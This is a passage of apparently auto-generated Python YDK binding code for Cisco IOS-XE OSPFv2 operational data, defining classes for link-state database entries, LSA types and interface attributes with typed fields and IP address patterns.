self.ospfv2_lsdb_area = YList(self)
self.ospfv2_interface = YList(self)
self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value)
class Ospfv2LsdbArea(Entity):
"""
The OSPF Link State Database information for this area
.. attribute:: lsa_type (key)
Link State Advertisement type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: lsa_id (key)
Link State Advertisement Identifer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advertising_router (key)
Advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_age
The age of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_options
The options of the Link State Advertisement
**type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>`
**config**\: False
.. attribute:: lsa_seq_number
The sequence number for the Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_checksum
The checksum of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_length
The length, in bytes, of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: ospfv2_router_lsa_links
The router Link State Advertisement links
**type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks>`
**config**\: False
.. attribute:: unsupported_lsa
The unsupported Link State Advertisements
**type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa>`
**config**\: False
.. attribute:: router_lsa
The router Link State Advertisements
**type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa>`
**config**\: False
.. attribute:: network_lsa
The network Link State Advertisements
**type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa>`
**config**\: False
.. attribute:: network_summary_lsa
The network summary Link State Advertisements
**type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa>`
**config**\: False
.. attribute:: router_summary_lsa
The router summary Link State Advertisements
**type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa>`
**config**\: False
.. attribute:: external_lsa
The external Link State Advertisements
**type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa>`
**config**\: False
.. attribute:: nssa_lsa
The Not So Stubby Area Link state advertisements
**type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__()
self.yang_name = "ospfv2-lsdb-area"
self.yang_parent_name = "ospfv2-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
])
self.lsa_type = None
self.lsa_id = None
self.advertising_router = None
self.lsa_age = None
self.lsa_options = Bits()
self.lsa_seq_number = None
self.lsa_checksum = None
self.lsa_length = None
self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa()
self.unsupported_lsa.parent = self
self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa()
self.router_lsa.parent = self
self._children_name_map["router_lsa"] = "router-lsa"
self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa()
self.network_lsa.parent = self
self._children_name_map["network_lsa"] = "network-lsa"
self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa()
self.network_summary_lsa.parent = self
self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa()
self.router_summary_lsa.parent = self
self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa()
self.external_lsa.parent = self
self._children_name_map["external_lsa"] = "external-lsa"
self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa()
self.nssa_lsa.parent = self
self._children_name_map["nssa_lsa"] = "nssa-lsa"
self.ospfv2_router_lsa_links = YList(self)
self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
class Ospfv2RouterLsaLinks(Entity):
"""
The router Link State Advertisement links
.. attribute:: link_type (key)
Link Type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_id (key)
link Identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_topo
Link topology
**type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__()
self.yang_name = "ospfv2-router-lsa-links"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_type','link_id','link_data']
self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
])
self.link_type = None
self.link_id = None
self.link_data = None
self.link_topo = YList(self)
self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
class LinkTopo(Entity):
"""
Link topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
self.yang_name = "link-topo"
self.yang_parent_name = "ospfv2-router-lsa-links"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "link-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
class UnsupportedLsa(Entity):
"""
The unsupported Link State Advertisements
.. attribute:: lsa_data
Link State Advertisement data
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__()
self.yang_name = "unsupported-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
])
self.lsa_data = []
self._segment_path = lambda: "unsupported-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value)
class RouterLsa(Entity):
"""
The router Link State Advertisements
.. attribute:: router_lsa_bits
Router Link State Advertisement bits
**type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>`
**config**\: False
.. attribute:: router_lsa_number_links
Router Link State Advertisement number of links
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__()
self.yang_name = "router-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
])
self.router_lsa_bits = Bits()
self.router_lsa_number_links = None
self._segment_path = lambda: "router-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
class NetworkLsa(Entity):
"""
The network Link State Advertisements
.. attribute:: network_lsa_mask
Network Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: network_attached_routers
Network attached routers
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__()
self.yang_name = "network-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
])
self.network_lsa_mask = None
self.network_attached_routers = []
self._segment_path = lambda: "network-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
class NetworkSummaryLsa(Entity):
"""
The network summary Link State Advertisements
.. attribute:: summary_lsa_mask
The summary Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: summary_topo
The summary topology
**type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__()
self.yang_name = "network-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "network-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
"""
The summary topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "network-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class RouterSummaryLsa(Entity):
"""
The router summary Link State Advertisements
.. attribute:: summary_lsa_mask
The summary Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: summary_topo
The summary topology
**type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__()
self.yang_name = "router-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "router-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
"""
The summary topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "router-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class ExternalLsa(Entity):
"""
The external Link State Advertisements
.. attribute:: external_lsa_mask
The mask for the external Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: external_topo
The external topology Link State Advertisement
**type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__()
self.yang_name = "external-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "external-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
"""
The external topology Link State Advertisement
.. attribute:: mt_id
The multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric_type
The topoligy metric type associated with the Link State Advertisement
**type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`
**config**\: False
.. attribute:: topo_metric
The topology metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: topo_forwarding_address
The topology forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: topo_route_tag
The topology route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "external-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class NssaLsa(Entity):
"""
The Not So Stubby Area Link state advertisements
.. attribute:: external_lsa_mask
The mask for the external Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: external_topo
The external topology Link State Advertisement
**type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__()
self.yang_name = "nssa-lsa"
self.yang_parent_name = "ospfv2-lsdb-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "nssa-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
"""
The external topology Link State Advertisement
.. attribute:: mt_id
The multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric_type
The topoligy metric type associated with the Link State Advertisement
**type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`
**config**\: False
.. attribute:: topo_metric
The topology metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: topo_forwarding_address
The topology forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: topo_route_tag
The topology route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "nssa-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class Ospfv2Interface(Entity):
"""
A list of interfaces that belong to the area
.. attribute:: name (key)
Name of the interface
**type**\: str
**config**\: False
.. attribute:: network_type
Network type
**type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>`
**config**\: False
.. attribute:: enable
If the interface is enabled
**type**\: bool
**config**\: False
.. attribute:: passive
If the interface is in passive mode
**type**\: bool
**config**\: False
.. attribute:: demand_circuit
If this is a demand circuit
**type**\: bool
**config**\: False
.. attribute:: mtu_ignore
If the MTU is being ignored
**type**\: bool
**config**\: False
.. attribute:: prefix_suppresion
If prefix suppression is enabled
**type**\: bool
**config**\: False
.. attribute:: cost
The OSPFv2 cost
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_interval
The hello interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: dead_interval
The dead interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: retransmit_interval
The retransmit interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: transmit_delay
The delay before transmitting a keepalive in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_timer
The current hello timer in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: wait_timer
The wait timer in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr
The designated router identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bdr
The backup designated router identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr_ip
The address of the designated router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
